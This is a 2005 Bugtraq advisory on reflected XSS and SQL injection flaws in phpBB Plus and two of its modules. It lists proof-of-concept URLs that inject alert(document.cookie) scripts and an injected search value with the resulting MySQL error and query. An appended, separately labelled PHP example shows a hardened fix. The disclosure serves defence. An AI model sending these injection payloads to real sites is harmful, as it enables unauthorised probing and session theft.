
List:       bugtraq
Subject:    Multiple Sql injection and XSS vulnerabilities in phpBB Plus
From:       dcrab <dcrab () hackerscenter ! com>
Date:       2005-04-13 22:32:03
Message-ID: 20050413223203.25005.qmail () www ! securityfocus ! com

Dcrab's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah

Severity: Medium
Title: Multiple SQL injection and XSS vulnerabilities in phpBB Plus v.1.52 and below and some of its modules.
Date: 13/04/2005

Vendor: PhpBB2 Plus and Smartor
Vendor Website: http://www.phpbb2.de, http://smartor.is-root.com/
Summary: There are multiple SQL injection and XSS vulnerabilities in phpBB Plus v.1.52 and below and in some of its modules.

Proof of Concept Exploits: 

PhpBB Plus v.1.52 and below
http://localhost/groupcp.php?g=881&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/index.php?c=1&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/index.php?c='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=5e4b2554e73f8ca07f348b5f68c85217
 Pops cookie


http://localhost/index.php?mark='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=5e4b2554e73f8ca07f348b5f68c85217
 Pops cookie


http://localhost/portal.php?article=0&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/portal.php?article='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=2fb087b5e3c7098d0e48a76a9c67cf59
 Pops cookie


http://localhost/viewforum.php?f=1&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/viewtopic.php?p=58834&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


Photo Album v2.0.53

http://localhost/album_search.php?mode='SQL_INJECTION&search=dcrab
SQL INJECTION

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id = c.cat_id OR p.pic_c

SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, p.pic_username, p.pic_time, p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM phpbb_album AS p,phpbb_album_cat AS c WHERE p.pic_approval = 1 AND LIKE '%\'SQL_INJECTION%' AND p.pic_cat_id = c.cat_id OR p.pic_cat_id = 0 AND p.pic_approval = 1 AND LIKE '%\'SQL_INJECTION%' ORDER BY p.pic_time DESC

Line : 105
File : album_search.php


http://localhost/album_cat.php?cat_id=5&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/album_comment.php?pic_id=224&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


Calendar MOD
http://localhost/calendar_scheduler.php?d=1113174000&mode=&start='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&amp%3bsid=d32836b8178e5d62b2b173ed177e4b0d
 Pops cookie


Possible Fixes: Validate and escape user input before it reaches the MySQL database (mysql_escape_string(), mysql_real_escape_string() or similar) and encode it before echoing it to the screen (htmlspecialchars()). Applying these functions at those two points would solve these problems.
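As an added illustration of the fix above (this is not phpBB, Photo Album or Smartor code, and not part of the original advisory), here is how the album search endpoint could be hardened. From the debug output quoted earlier it assumes that the mode parameter chooses the column being searched and the search parameter supplies the LIKE term; the table and column names are taken from that output. Everything else is hypothetical: the mode whitelist, the PDO connection and its placeholder credentials, and the sid check (the 32-character hex form is taken from the sid values in the proof-of-concept URLs). It uses PDO prepared statements instead of the mysql_escape_string()/mysql_real_escape_string() calls the advisory names, because a column name cannot be made safe by escaping, only by whitelisting.

```php
<?php
// Added example, not project code: hardened album search (hypothetical rewrite).

// 1. "mode" selects a column name. Column names cannot be bound as parameters,
//    so the only safe option is a fixed whitelist; anything else falls back to
//    a default instead of being interpolated into the query.
$allowed_modes = array(
    'title' => 'p.pic_title',
    'desc'  => 'p.pic_desc',
);
$mode = isset($_GET['mode']) ? (string) $_GET['mode'] : 'title';
if (!isset($allowed_modes[$mode])) {
    $mode = 'title';
}
$column = $allowed_modes[$mode];

// 2. "search" is data, never SQL: it goes in as a bound parameter. LIKE
//    metacharacters are escaped so a user cannot widen the match with % or _.
$search = isset($_GET['search']) ? (string) $_GET['search'] : '';
if ($search === '') {
    exit('No search term given.');
}
$pattern = '%' . addcslashes($search, '%_\\') . '%';

// 3. "sid" is reflected into every link. Accept only the 32-hex-char session id
//    format seen in real sids; drop anything else rather than echoing it back.
$sid = isset($_GET['sid']) ? (string) $_GET['sid'] : '';
if (!preg_match('/^[0-9a-f]{32}$/', $sid)) {
    $sid = '';
}

// Placeholder credentials: replace with the board's real DSN/user/password.
$pdo = new PDO('mysql:host=localhost;dbname=phpbb;charset=utf8', 'dbuser', 'dbpass');
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Same tables and columns as the query in the debug output; the category
// condition is parenthesised so the approval check applies to every row.
$sql = "SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, p.pic_username,
               p.pic_time, p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title
        FROM phpbb_album AS p, phpbb_album_cat AS c
        WHERE p.pic_approval = 1
          AND $column LIKE :pattern
          AND (p.pic_cat_id = c.cat_id OR p.pic_cat_id = 0)
        ORDER BY p.pic_time DESC";
$stmt = $pdo->prepare($sql);
$stmt->bindValue(':pattern', $pattern, PDO::PARAM_STR);
$stmt->execute();

// 4. Everything written into HTML is encoded on output, including values that
//    came straight from the database and the sid appended to links.
$sid_query = ($sid !== '') ? '&amp;sid=' . $sid : '';
echo '<p>Results for ' . htmlspecialchars($search, ENT_QUOTES, 'UTF-8') . '</p>';
echo '<ul>';
foreach ($stmt as $row) {
    echo '<li><a href="album_page.php?pic_id=' . (int) $row['pic_id'] . $sid_query . '">'
       . htmlspecialchars($row['pic_title'], ENT_QUOTES, 'UTF-8')
       . '</a></li>';
}
echo '</ul>';
```

Note that the whitelist, not the escaping function, is what stops the mode parameter from reaching the parser as SQL; the escaping and encoding functions the advisory recommends cover the data values and the HTML output, which is why both layers are needed.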

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon-to-come-out book on secure coding with PHP.

